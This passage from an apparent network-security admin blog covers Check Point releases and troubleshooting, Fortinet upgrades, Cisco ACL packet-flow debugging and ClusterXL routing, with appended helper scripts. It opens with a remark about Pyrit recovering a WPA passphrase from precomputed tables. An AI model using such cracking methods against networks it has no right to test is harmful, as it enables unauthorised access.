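Running it recovers the passphrase from the table built for "corp-wifi" and finds nothing with the table built for another SSID, even though it contains the right word: the table is only as reusable as the SSID is common, which is exactly why Pyrit ships tables for the most popular ESSIDs and why a unique SSID plus a long passphrase is the practical defence.</div>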
<br />
<a href="https://code.google.com/p/pyrit/">https://code.google.com/p/pyrit/</a>Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-52955225281720623722013-09-02T22:29:00.001+03:002013-09-02T22:29:52.142+03:00R77 is now available!<h2 id="New" style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 14px; margin: 8px 0px; padding-top: 10px;">
<br />It seems to be the best one ever.</h2>
<h2 id="New" style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 14px; margin: 8px 0px; padding-top: 10px;">
<br /></h2>
<h2 id="New" style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 14px; margin: 8px 0px; padding-top: 10px;">
What's New in R77</h2>
<h3 style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px; margin: 8px 0px;">
New Threat Emulation Software Blade</h3>
<div style="background-color: white; font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px;">
The new Threat Emulation Software Blade blocks attacks which cannot be detected by signatures. It opens inspected files inside secure emulation environments to detect malicious behavior. It can be deployed as a cloud service or as a private (local) cloud.</div>
<h3 style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px; margin: 8px 0px;">
New Check Point Compliance Blade</h3>
<div style="background-color: white; font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px;">
This new Software Blade analyzes your environment for compliance with major regulations and international standards. Check Point Compliance Blade generates detailed reports, with best practice recommendations taken from the large Check Point library. Check Point Compliance Blade sends alerts for policy changes that can affect compliance.</div>
<h3 style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px; margin: 8px 0px;">
HyperSPECT Technology</h3>
<div style="background-color: white; font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px;">
Improvements to the deep packet inspection engines boost performance for the IPS and the Application and URL Filtering Software Blades.</div>
<ul style="background-color: white; font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px;">
<li>Supports SMT (Hyper-Threading)</li>
<li>Optimizations to DPI engines including streamers, parsers and pattern matching engines</li>
</ul>
<h3 style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px; margin: 8px 0px;">
Gaia Operating System Enhancements</h3>
<ul style="background-color: white; font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px;">
<li>Centrally manage basic network configuration</li>
<li>Back up and restore, run scripts, remote shell, and more, from a central console</li>
<li>Synchronize cluster members with Gaia OS configuration cloning</li>
</ul>
<h3 style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px; margin: 8px 0px;">
Enhanced Gaia Software Updates</h3>
<div style="background-color: white; font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px;">
Update the Gaia operating system with the enhanced <strong>Automated Software Updates</strong> tool:</div>
<ul style="background-color: white; font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px;">
<li>Clean install of full image and upgrade of optimally sized package from the Check Point Cloud</li>
<li>Up to 90% less downtime for Security Gateway upgrade</li>
<li>Export and import of Gaia software update packages</li>
<li>New WebUI features with enhanced usability</li>
</ul>
<h3 style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px; margin: 8px 0px;">
Enhanced Identity Awareness</h3>
<ul style="background-color: white; font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px;">
<li>New identity acquisition method: RADIUS Accounting</li>
<li>Automatic update of LDAP group membership changes</li>
<li>Improved Identity Agent installation, with support for repair tools</li>
<li>New MSI configuration tool for Agent distribution</li>
</ul>
<br />
...<br />
<br />
A lot more at:<br />
<br />
<a href="https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk92965">https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk92965</a>Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-60415972356694776542013-08-29T16:46:00.003+03:002013-08-29T16:47:32.070+03:00Sending Syslog flow to an External Log Server<br />
Dear Checkpoint Fellows and Followers,<br />
<br />
Syslog data can be sent as shown in sk33423, but only from physical boxes.<br />
<br />
If you have a VSX infrastructure, it is not possible to send the syslog of each VSX customer to a separate syslog server.<br />
<br />
Sincerely.<br />
<br />
<br />Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-29593489563925966342013-08-29T16:41:00.003+03:002013-08-29T16:41:59.807+03:00Checkpoint R77<br />Very excited to test the new blades! :)Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-81429288597031822712013-08-02T11:31:00.001+03:002013-08-02T11:31:28.134+03:00Check Point R75.47 Released!<br />
<br />
<span style="color: #666666;">Judging by the </span><a href="http://supportcontent.checkpoint.com/documentation_download?ID=25460" style="background-color: white; border: 0px; color: #3170c9; font-family: Arial, Helvetica, sans-serif; font-size: 15px; line-height: 25px; margin: 0px; outline: none 0px; padding: 0px; vertical-align: baseline;" target="_blank" title="Check Point R75.47 Release Notes">release notes</a><span style="background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 15px; line-height: 25px;"> and the </span><a href="http://supportcontent.checkpoint.com/solutions?id=sk93450" style="background-color: white; border: 0px; color: #3170c9; font-family: Arial, Helvetica, sans-serif; font-size: 15px; line-height: 25px; margin: 0px; outline: none 0px; padding: 0px; vertical-align: baseline;" target="_blank" title="Check Point R75.47 Resolves Issues">resolved issues</a><span style="background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 15px; line-height: 25px;">, it is mainly a maintenance (bug-fix) release.</span><br />
<br style="background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 15px; line-height: 25px;" />
<span style="background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 15px; line-height: 25px;">There are a lot of fixed bugs.</span><br />
<br style="background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 15px; line-height: 25px;" />
<span style="background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 15px; line-height: 25px;">It would be good to install this version in a test environment first, and then move it into production as soon as possible.</span><br />
<span style="background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 15px; line-height: 25px;"><br /></span>
Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-10167560400316008112013-07-31T01:41:00.001+03:002013-07-31T01:41:06.515+03:00License Info Tool / Checkpoint<div class="separator" style="clear: both; text-align: left;">
License Info Tool for Check Point. I found it pretty useful, as license issues are often complicated. It is under My Products &gt; License Info Tool.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLzSxOf7dxgRlLsSGrvYDi8q_DTStvRlof1_YI3-FE2GGyNpTLrSZCrgjXcHK7spnrGVGc5TtXRgmhEppf_Apx99-O5EliubBLMzosXc7im-pmXbQjrjaPWDaADZQSkGk99Z7vj-D3HfkQ/s1600/license_CheckPoint.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="166" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLzSxOf7dxgRlLsSGrvYDi8q_DTStvRlof1_YI3-FE2GGyNpTLrSZCrgjXcHK7spnrGVGc5TtXRgmhEppf_Apx99-O5EliubBLMzosXc7im-pmXbQjrjaPWDaADZQSkGk99Z7vj-D3HfkQ/s400/license_CheckPoint.PNG" width="400" /></a></div>
<br />Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-86941964031617941632013-07-21T16:24:00.002+03:002013-07-21T16:26:29.704+03:00Fortinet Upgrade Procedures<br />
<br />
Upgrades have usually been an issue with Check Point. With Fortinet, however, the procedure is unbelievably easy (even in a cluster environment):<br />
<br />
- the .out firmware image is downloaded from the support site,<br />
- it is uploaded through the GUI.<br />
<br />
Then the whole process runs automatically: first the active member is upgraded, losing 4-6 ping packets, and then 2-3 pings are lost while the second member is upgraded.<br />
<br />
I suppose the reason is really the architectural difference behind these boxes.<br />
<br />
<br />Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-22350161508283398422013-05-13T10:18:00.002+03:002013-06-24T13:07:00.502+03:00New Titles are Upcoming- Arbor<br />
- McAfee<br />
- FortinetEkin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-61778910679499740222013-02-22T14:40:00.001+02:002013-02-22T14:56:59.416+02:00Network Troubleshooting - Cisco Packet FlowTo be or not to be.<br />
Incoming or outgoing packets: understanding in which direction a packet is seen is often vital in the troubleshooting process. The two ACLs below permit everything, so they do not change what the router forwards, but they count (and log) the packets that hit the interface in each direction:<br />
<br />
<br />
<pre>
ip access-list extended gre-debug-out
 permit gre any any log
 permit ip any any log
!
ip access-list extended gre-debug-in
 permit gre any any log
 permit ip any any log
!
interface GigabitEthernet0/1
 ip access-group gre-debug-in in
 ip access-group gre-debug-out out
</pre>
<div class="MsoNormal">
The <code>permit gre</code> lines are optional; they only separate the GRE hit counter from the rest of the IP traffic.<br />
<br />
Here it is:</div>
<pre>
show ip access-list gre-debug-in
show ip access-list gre-debug-out
</pre>
<div class="MsoNormal">
Note that <code>log</code> on a <code>permit ip any any</code> entry hands every matching packet to the logging process, which costs CPU on a busy router, so remove the debug ACLs from the interface once you are done.<br />
<br />
believe me you will like the result..</div>
<div class="MsoNormal">
<span lang="EN-GB">:)</span></div>
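<div class="MsoNormal">
As an added example (not part of the original post), the script below does the comparison the post is after: it parses two <code>show ip access-lists</code> snapshots taken a little apart and reports, per protocol, how many packets hit the inbound ACL versus the outbound ACL on the interface, flagging traffic that is only seen in one direction. The snapshot text is constructed in IOS's display format for the two ACL names used above; the ACL and interface names are the ones from the post, everything else is assumed.</div>

```python
"""Added example, not from the original post: compare inbound vs outbound hit
counters of two `show ip access-lists` snapshots to see packet flow per protocol.
The snapshots are constructed in IOS's display format for the post's two ACLs."""
import re

HEADER = re.compile(r"^(?:Extended|Standard) IP access list (\S+)")
ENTRY = re.compile(r"^\s*(\d+)\s+(permit|deny)\s+(\S+)\s+(.*?)(?:\s+\((\d+) matches?\))?\s*$")

# Constructed snapshots: before and after letting traffic run for a while.
SNAP_BEFORE = """\
Extended IP access list gre-debug-in
    10 permit gre any any log (40 matches)
    20 permit ip any any log (1000 matches)
Extended IP access list gre-debug-out
    10 permit gre any any log (40 matches)
    20 permit ip any any log (900 matches)
"""
SNAP_AFTER = """\
Extended IP access list gre-debug-in
    10 permit gre any any log (58 matches)
    20 permit ip any any log (1200 matches)
Extended IP access list gre-debug-out
    10 permit gre any any log (40 matches)
    20 permit ip any any log (1100 matches)
"""


def parse_show_acl(text: str) -> dict:
    """{acl_name: {(seq, action, protocol, rest): match_count}}.
    IOS prints no '(N matches)' suffix for an entry that was never hit; that counts as 0."""
    acls, current = {}, None
    for line in text.splitlines():
        m = HEADER.match(line)
        if m:
            current = acls.setdefault(m.group(1), {})
            continue
        m = ENTRY.match(line)
        if m and current is not None:
            seq, action, proto, rest, count = m.groups()
            current[(int(seq), action, proto, rest)] = int(count or 0)
    return acls


def delta_per_protocol(before: dict, after: dict) -> dict:
    """{acl_name: {protocol: packets counted between the two snapshots}}."""
    out = {}
    for name, entries in after.items():
        per_proto = out.setdefault(name, {})
        for key, count in entries.items():
            proto = key[2]
            per_proto[proto] = per_proto.get(proto, 0) + count - before.get(name, {}).get(key, 0)
    return out


def flow_report(before_text: str, after_text: str, acl_in: str, acl_out: str) -> dict:
    """Per protocol: (packets in, packets out, verdict). A protocol seen in only
    one direction is the classic symptom the post is hunting for."""
    d = delta_per_protocol(parse_show_acl(before_text), parse_show_acl(after_text))
    ins, outs = d.get(acl_in, {}), d.get(acl_out, {})
    report = {}
    for proto in sorted(set(ins) | set(outs)):
        i, o = ins.get(proto, 0), outs.get(proto, 0)
        if i and o:
            verdict = "both directions"
        elif i or o:
            verdict = "one-way: only " + ("inbound" if i else "outbound")
        else:
            verdict = "no traffic"
        report[proto] = (i, o, verdict)
    return report


if __name__ == "__main__":
    for proto, row in flow_report(SNAP_BEFORE, SNAP_AFTER, "gre-debug-in", "gre-debug-out").items():
        print(f"{proto:5} in={row[0]:6} out={row[1]:6}  {row[2]}")
```

<div class="MsoNormal">
With the constructed snapshots the report shows 18 GRE packets arriving on Gi0/1 and none leaving, while plain IP flows both ways: the tunnel peer is sending, but this router never answers on that interface, which narrows the search to routing or the tunnel configuration rather than the link.</div>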
Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-285333445142948992013-02-22T12:01:00.004+02:002013-02-22T12:01:52.862+02:00Identity Awareness - User & Machine IdentificationEven though SmartDashboard shows users and/or machines as acquired, pdp monitor on the gateway is where the result of the AD query actually shows up. If you do not see the users/machines in pdp monitor, Check Point did not actually acquire them.<br />
<br />
<pre>
pdp monitor all | more

pdp monitor all | grep &lt;machine or user name&gt;
</pre>
<br />
<br />Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-81213511320179192752013-02-15T13:39:00.003+02:002013-02-15T13:39:57.928+02:00IPS Update: ips scheduled update ended with errors<br />
<div class="post-body entry-content" id="post-body-5044976145879441173" itemprop="description articleBody" style="background-color: white; color: #444444; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px; position: relative; width: 586px;">
<br /><div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUrvaygB1_-w86lU7ZvNDay-vhnMHFeM87oSjJVg0xlOFXAOWzNF_ekTbWKxHkE_eHD0UA1vRukwXjJs_ltKqkJlgmh96e0Xi5mKb8N0ssilnQiEBc8hOqL8oeQlucNiReEDtlNZSYO0pj/s1600/IPS.jpg" imageanchor="1" style="color: #4d469c; margin-left: 1em; margin-right: 1em; text-decoration: initial;"><img border="0" dba="true" height="114" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUrvaygB1_-w86lU7ZvNDay-vhnMHFeM87oSjJVg0xlOFXAOWzNF_ekTbWKxHkE_eHD0UA1vRukwXjJs_ltKqkJlgmh96e0Xi5mKb8N0ssilnQiEBc8hOqL8oeQlucNiReEDtlNZSYO0pj/s320/IPS.jpg" style="-webkit-box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; background-color: transparent; border-bottom-left-radius: 0px; border-bottom-right-radius: 0px; border-top-left-radius: 0px; border-top-right-radius: 0px; border: 1px solid transparent; box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; padding: 8px; position: relative;" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Check the internet connection on the SMC, and check the DNS configuration to verify that updates.checkpoint.com resolves to an IP address.<br /><br />To reset the IPS update status manually:</div>
<div class="post-body entry-content" id="post-body-5044976145879441173" itemprop="description articleBody" style="background-color: white; color: #444444; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px; position: relative; width: 586px;">
<br />1- Close all GUI applications.<br />2- Open GuiDBedit (GuiDBedit.exe) and connect to the SMC.<br />3- Search (Search -&gt; Find) for: autoupdate_and_install_status_obj<br /><br />Once found, you will see a field named status under that object.<br />4- Change the value of status to 0.<br />5- Save the changes and close GuiDBedit.<br />6- Open SmartDashboard and verify that the issue is resolved.<br /><br />Note: There is a fix for this issue; request it from Check Point Support.</div>
Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-47415508819775199082013-02-13T15:52:00.002+02:002013-02-14T14:09:09.221+02:00ClusterXL - Do not Consume Public IPs for ClusterXL<br />
<i style="line-height: 19.5pt;"><span style="color: #323232; font-family: Helvetica, sans-serif; font-size: 12pt;">Configuring Cluster Addresses on Different Subnets</span></i><br />
<div class="MsoNormal" style="line-height: 19.5pt; vertical-align: baseline;">
<i><span style="color: #323232; font-family: Helvetica, sans-serif; font-size: 12pt;">Only one routable IP address is required in a ClusterXL cluster, for the virtual cluster interface that faces the Internet. All cluster member physical IP addresses can be non-routable. Configuring different subnets for the cluster IP addresses and the member addresses is useful in order to:</span></i></div>
<div class="MsoNormal" style="line-height: 19.5pt; vertical-align: baseline;">
<i><span style="color: #323232; font-family: Helvetica, sans-serif; font-size: 12pt;"><br />
- Enable a multi-machine cluster to replace a single-machine gateway in a pre-configured network, without the need to allocate new addresses to the cluster members.<br />
- Allow organizations to use only one routable address for the ClusterXL Gateway Cluster. This saves routable addresses.</span></i></div>
<div class="MsoNormal" style="line-height: 19.5pt; vertical-align: baseline;">
<img height="341" src="http://alpacapowered.files.wordpress.com/2012/08/clusterif.png" width="400" /></div>
<div class="MsoNormal" style="background: white; line-height: 19.5pt; vertical-align: baseline;">
<span style="color: #323232; font-family: Helvetica, sans-serif; font-size: 12pt;">ClusterXL virtual IPs and your members' physical (or VLAN) interfaces do not need to be on the same subnet. So you can simply use whichever addresses you like for each of the cluster interfaces (apart from internal/management and external/VPN-routable interfaces obviously). And of course this applies to physical untagged interfaces, unlike our case, too.<br />
I settled for using tiny Class B private space /30 subnets for each VLAN, enough for just our 2 cluster members, like this. The topology would then look like this.</span><br />
<a name='more'></a></div>
<div class="MsoNormal" style="background: white; line-height: 39.0pt; margin-bottom: 19.5pt; vertical-align: baseline;">
<b><span style="color: #323232; font-family: Georgia, serif; font-size: 13.5pt;">Beware of the spoofing and routing</span></b></div>
<div class="MsoNormal" style="background: white; line-height: 19.5pt; vertical-align: baseline;">
<span style="color: #323232; font-family: Helvetica, sans-serif; font-size: 12pt;">Now here are just 2 catches with this configuration. First off, anti-spoofing will apply to the members' local interface network and not the ClusterXL virtual one, so you can't use the comfortable <i>"Network defined by the interface IP and Net Mask"</i> setting unless you want all your traffic dropped/detected as spoofed. Instead just define a specific subnet object representing the ClusterXL interface subnet.</span></div>
<div class="MsoNormal" style="background: white; line-height: 19.5pt; vertical-align: baseline;">
<span style="color: #323232; font-family: Helvetica, sans-serif; font-size: 12pt;">The second thing which shortly caused some headache for me was that SPLAT/Gaia wouldn't know where it needs to route the public subnet. Now that the physical interfaces to those subnets had different IPs, the OS naturally lacked the proper routing information and would forward traffic through the default route.<br />
To solve this, I added static interface-based routes for each public subnet like this. To my confusion however, they didn't help and seemed to have no effect. Checking the firewall nodes' routing table via SSH confirmed that there was no corresponding entry present.</span></div>
<div class="MsoNormal" style="background: white; line-height: 19.5pt; vertical-align: baseline;">
<img height="400" src="http://alpacapowered.files.wordpress.com/2012/08/interfaceroute.png" width="311" /></div>
<div class="MsoNormal" style="background: white; line-height: 19.5pt; vertical-align: baseline;">
<span style="color: #323232; font-family: Helvetica, sans-serif; font-size: 12pt;">Instead I had to issue the following in expert mode on the nodes to activate my routes:</span>
<pre># route add -net 47.88.145.40/29 eth8.356</pre>
<span style="color: #323232; font-family: Helvetica, sans-serif; font-size: 12pt;">The routing table would now look like this:</span>
<pre># route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
172.31.255.16   0.0.0.0         255.255.255.252 U     0      0        0 eth8.356
47.88.145.40    0.0.0.0         255.255.255.248 U     0      0        0 eth8.356
</pre></div>
<div class="MsoNormal" style="background: white; line-height: 19.5pt; vertical-align: baseline;">
<span style="color: #323232; font-family: Helvetica, sans-serif; font-size: 12pt;">On the new Gaia CLI it looks like this:</span>
<pre>&gt; show route
Codes: C - Connected, S - Static, R - RIP, B - BGP,
       O - OSPF IntraArea (IA - InterArea, E - External, N - NSSA)
       A - Aggregate, K - Kernel Remnant, H - Hidden, P - Suppressed
C    47.88.145.40/29    is directly connected, eth8.356
C    172.31.255.16/30   is directly connected, eth8.356
</pre>
<span style="color: #323232; font-family: Helvetica, sans-serif; font-size: 12pt;">The route command in expert mode alone doesn't survive a reboot; you still need to set all routes in the Gaia/SPLAT CLI/web interface on all members. I confirmed that the routes are being applied properly after a reboot. Also, static routes using gateway IPs do not need a reboot either, so this seems like a bug specific to using interface-based routes.</span></div>
<div class="MsoNormal" style="background: white; line-height: 19.5pt; vertical-align: baseline;">
<span style="color: #323232; font-family: "Helvetica","sans-serif"; font-size: 12.0pt; mso-fareast-language: TR;"><br /></span></div>
<div class="MsoNormal" style="background: white; line-height: 19.5pt; vertical-align: baseline;">
<a href="http://alpacapowered.wordpress.com/2012/08/23/running-check-point-clusterxl-member-interfaces-on-different-subnets-than-the-virtual-interfaces/" style="line-height: normal;">http://alpacapowered.wordpress.com/2012/08/23/running-check-point-clusterxl-member-interfaces-on-different-subnets-than-the-virtual-interfaces/</a> </div>
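The quoted post ends with the point that only routes configured through Gaia clish survive a reboot. The following is an added example, not code from the quoted post or from Check Point: it reads the expert-mode <code>route -n</code> table shown above and prints the matching clish commands for the interface-based routes (gateway 0.0.0.0, no G flag), followed by <code>save config</code>. The clish syntax <code>set static-route &lt;prefix&gt; nexthop gateway logical &lt;interface&gt; on</code> is an assumption about Gaia's static-route command set; check it against your Gaia version before applying the output.

```shell
#!/bin/sh
# Added example (not from the quoted post or from Check Point): convert
# expert-mode "route -n" output into Gaia clish commands so that the
# interface routes persist across reboots.
# Assumption: Gaia accepts
#   set static-route <prefix> nexthop gateway logical <interface> on
# for an interface-based route; verify the syntax on your Gaia version.

# Sample table, taken from the route -n output quoted in the post above.
SAMPLE_ROUTE_TABLE='Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
172.31.255.16   0.0.0.0         255.255.255.252 U     0      0        0 eth8.356
47.88.145.40    0.0.0.0         255.255.255.248 U     0      0        0 eth8.356'

# Dotted netmask -> prefix length (counts set bits; assumes a contiguous mask).
mask_to_prefix() {
    echo "$1" | awk -F. '{
        bits = 0
        for (i = 1; i <= 4; i++) {
            o = $i
            while (o > 0) { bits += o % 2; o = int(o / 2) }
        }
        print bits
    }'
}

# Reads route -n output on stdin and prints one clish command per
# interface-based route (gateway 0.0.0.0 and no G flag), then "save config".
# Subnets already configured on the interface (here 172.31.255.16/30) are
# ordinary connected routes; drop those lines before applying the output.
routes_to_clish() {
    while read -r dest gw mask flags metric ref use iface; do
        case "$dest" in
            Kernel|Destination|"") continue ;;       # header and blank lines
        esac
        [ "$gw" = "0.0.0.0" ] || continue           # skip gateway routes
        case "$flags" in *G*) continue ;; esac      # G flag = via a gateway
        [ -n "$iface" ] || continue
        printf 'set static-route %s/%s nexthop gateway logical %s on\n' \
            "$dest" "$(mask_to_prefix "$mask")" "$iface"
    done
    echo 'save config'
}

# Usage on a cluster member, in expert mode:
#   route -n | sh routes_to_clish.sh convert      (review, then feed to clish)
#   sh routes_to_clish.sh demo                    (converts the sample table)
case "${1:-}" in
    convert) routes_to_clish ;;
    demo)    printf '%s\n' "$SAMPLE_ROUTE_TABLE" | routes_to_clish ;;
esac
```

Review the generated commands before running them through clish: the converter emits a line for every interface route in the table, including the member's own connected subnet, which Gaia already knows about.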
Ekin Tulga<br />
2013-02-11T15:24:00+02:00 Smart Event &amp; Reporter (CPU Peaks)<br />
<div class="MsoPlainText">
# evstop<o:p></o:p></div>
<div class="MsoPlainText">
# rm -r $RTDIR/distrib/*<o:p></o:p></div>
<div class="MsoPlainText">
# evstart<o:p></o:p></div>
<div class="MsoPlainText">
Install the policy from the SmartEvent console.<o:p></o:p></div>
<div class="MsoPlainText">
<br /></div>
<br />
<div class="MsoPlainText">
If not resolved,<o:p></o:p></div>
<div class="MsoPlainText">
<br /></div>
<div class="MsoPlainText">
# fw debug cpsemd on TDERROR_ALL_ALL=5 <o:p></o:p></div>
<div class="MsoPlainText">
# fw debug cpsead on TDERROR_ALL_ALL=5<o:p></o:p></div>
<div class="MsoPlainText">
<br /></div>
<div class="MsoPlainText">
To end debugging:<o:p></o:p></div>
<div class="MsoPlainText">
<br /></div>
<div class="MsoPlainText">
# fw debug cpsemd off TDERROR_ALL_ALL=0 <o:p></o:p></div>
<div class="MsoPlainText">
# fw debug cpsead off TDERROR_ALL_ALL=0<o:p></o:p></div>
<div class="MsoPlainText">
<br /></div>
<div class="MsoPlainText">
Then check the files $RTDIR/log/cpsemd.elg* and $RTDIR/log/cpsead.elg*.<o:p></o:p></div>
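The reset and debug steps above, wrapped in a script. This is an added example, not code from the post or from Check Point: the only thing it adds to the commands listed is a check that $RTDIR is set to an absolute path with a distrib directory before anything is removed, plus a DRY_RUN switch that prints the commands instead of running them. It assumes a SmartEvent host where evstop, evstart and fw are on the path.

```shell
#!/bin/sh
# Added example (not from the post or from Check Point): run the SmartEvent
# reset and debug steps with a guard around the rm step, so an unset or
# odd $RTDIR cannot widen what gets deleted.
# Assumes a Check Point SmartEvent host with evstop/evstart/fw available.
# DRY_RUN=1 prints each command instead of executing it.

# Returns 0 when DIR is an absolute path (not "/") with a distrib/ subdirectory.
distrib_dir_ok() {
    dir="$1"
    case "$dir" in
        /?*) ;;
        *) return 1 ;;
    esac
    [ -d "$dir/distrib" ]
}

# Run a command, or echo it when DRY_RUN=1.
run() {
    if [ "${DRY_RUN:-0}" = "1" ]; then
        echo "+ $*"
    else
        "$@"
    fi
}

# evstop -> clear $RTDIR/distrib -> evstart, as in the post.
reset_smartevent() {
    if ! distrib_dir_ok "${RTDIR:-}"; then
        echo "RTDIR is not set to a usable directory: '${RTDIR:-}'" >&2
        return 1
    fi
    run evstop
    # Only the contents of distrib/ go; the current directory is never touched.
    run sh -c 'rm -rf -- "$1"/distrib/*' sh "$RTDIR"
    run evstart
    echo "Now install the policy from the SmartEvent console."
}

# $1 = on|off: toggles cpsemd/cpsead debug at the levels the post uses
# (TDERROR_ALL_ALL=5 on, 0 off) and lists the .elg files when turning off.
debug_toggle() {
    case "$1" in
        on)  level=5 ;;
        off) level=0 ;;
        *)   echo "usage: debug_toggle on|off" >&2; return 2 ;;
    esac
    run fw debug cpsemd "$1" TDERROR_ALL_ALL=$level
    run fw debug cpsead "$1" TDERROR_ALL_ALL=$level
    if [ "$1" = "off" ]; then
        ls "${RTDIR:-.}"/log/cpsemd.elg* "${RTDIR:-.}"/log/cpsead.elg* 2>/dev/null
    fi
    return 0
}

# Usage: sh smartevent_reset.sh reset | debug-on | debug-off
case "${1:-}" in
    reset)     reset_smartevent ;;
    debug-on)  debug_toggle on ;;
    debug-off) debug_toggle off ;;
esac
```

Run it once with DRY_RUN=1 first; the printed rm line shows exactly which path the real run would clear.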
<br />Ekin Tulga<br />
2013-02-06T10:06:00+02:00 Check Point - Identity Awareness (Security Event Logs)<br />
<span style="background-color: #fafafa; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px;">Check Point Identity Awareness (every PDC had to be supplied in order to capture all IA events.)</span><br />
<br style="background-color: #fafafa; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px;" />
<span style="background-color: #fafafa; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px;">AD Query reads these events from the Security Event log:</span><br />
<span style="background-color: #fafafa; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px;"> On Windows Server 2003 domain controllers - 672, 673, 674</span><br />
<span style="background-color: #fafafa; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px;"> On Windows Server 2008 domain controllers - 4624, 4769, 4768, 4770</span><br />
<br style="background-color: #fafafa; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px;" />
<span style="background-color: #fafafa; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px;">If the domain controller does not generate these events (by default they are generated), refer to the Microsoft Active Directory documentation for instructions on how to configure these events.</span><br />
Ekin Tulga